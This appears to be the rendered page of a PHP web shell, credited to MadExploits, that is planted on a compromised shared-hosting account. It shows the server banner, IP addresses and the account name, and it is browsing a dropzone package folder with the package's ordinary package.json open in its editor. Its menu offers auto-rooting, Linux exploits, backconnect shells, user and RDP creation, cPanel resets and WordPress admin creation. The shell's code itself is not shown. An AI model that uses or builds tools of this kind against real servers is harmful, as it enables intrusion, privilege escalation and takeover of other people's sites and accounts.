Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
dropzone /
[ HOME SHELL ]
Name
Size
Permission
Action
dist
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
CHANGELOG.md
5.76
KB
-rw-r--r--
CODE_OF_CONDUCT.md
3.26
KB
-rw-r--r--
LICENSE
1.11
KB
-rw-r--r--
README.md
2.25
KB
-rw-r--r--
composer.json
370
B
-rw-r--r--
package.json
1.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "dropzone", "version": "5.9.3", "description": "Handles drag and drop of files for you.", "keywords": [ "dragndrop", "drag and drop", "file upload", "upload" ], "homepage": "http://www.dropzonejs.com", "main": "./dist/dropzone.js", "browserslist": "defaults, > 0.25%, IE 11", "maintainers": [ { "name": "Matias Meno", "email": "m@tias.me", "web": "https://www.yesmeno.com" } ], "contributors": [ { "name": "Matias Meno", "email": "m@tias.me", "web": "https://www.yesmeno.com" } ], "scripts": { "build": "webpack && cp dist/dropzone.js dist/dropzone-amd-module.js && cp dist/min/dropzone.min.js dist/min/dropzone-amd-module.min.js", "test": "karma start --single-run --browsers ChromeHeadless test/karma.conf.js", "build-website": "grunt build-website" }, "bugs": { "email": "m@tias.me", "url": "https://github.com/dropzone/dropzone/issues" }, "license": "MIT", "repository": { "type": "git", "url": "https://github.com/dropzone/dropzone.git" }, "devDependencies": { "@babel/core": "^7.11.0", "@babel/preset-env": "^7.11.0", "babel-loader": "^8.0.0", "chai": "4.3.0", "core-js": "^3.8.0", "css-loader": "^5.0.2", "extract-loader": "^5.1.0", "file-loader": "^6.2.0", "html-loader": "^2.1.0", "karma": "^6.1.0", "karma-chrome-launcher": "^3.1.0", "karma-mocha": "^2.0.1", "karma-rollup-preprocessor": "^7.0.5", "karma-sinon-chai": "^2.0.2", "karma-spec-reporter": "^0.0.32", "marked": "^2.0.0", "mocha": "^8.3.0", "mocha-headless-chrome": "^3.0.0", "rollup": "^2.38.4", "rollup-plugin-html": "^0.2.1", "sass": "^1.33.0", "sass-loader": "^11.0.1", "sinon": "^9.2.4", "sinon-chai": "^3.5.0", "webpack": "^5.23.0", "webpack-cli": "^4.5.0", "webpack-shell-plugin-next": "^2.1.1" } }
Close